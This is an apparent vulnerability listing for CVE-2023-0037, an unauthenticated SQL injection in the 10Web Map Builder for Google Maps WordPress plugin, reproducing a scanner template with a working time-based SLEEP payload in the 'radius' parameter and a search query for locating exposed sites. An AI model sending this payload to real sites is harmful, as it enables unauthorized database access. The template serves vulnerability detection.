漏洞描述
The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
CVE-2023-0037: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
PoC代码[已公开]
id: CVE-2023-0037
info:
name: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
author: riteshs4hu
severity: critical
description: |
The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
remediation: Fixed in 1.0.73
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-0037
- https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
- https://bulletin.iese.de/post/wd-google-maps_1-0-72_1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0037
cwe-id: CWE-89
epss-score: 0.69395
epss-percentile: 0.98604
cpe: cpe:2.3:a:10web:map_builder_for_google_maps:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: 10web
product: map_builder_for_google_maps
framework: wordpress
zoomeye-query: http.body="wp-content/plugins/wd-google-maps"
tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based
http:
- raw:
- |
@timeout: 15s
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'contains(body, "wd-google-maps")'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a00473045022100b41b00e51303ded31deec9c73f56c3e2c35ac6e3f0cb955e86e3ff6127f2373802206b48f6aa300b18aae299c87e7b80674def331f103479856fd8866f146e92ddcf:922c64590222798bb761d5b6d8e72950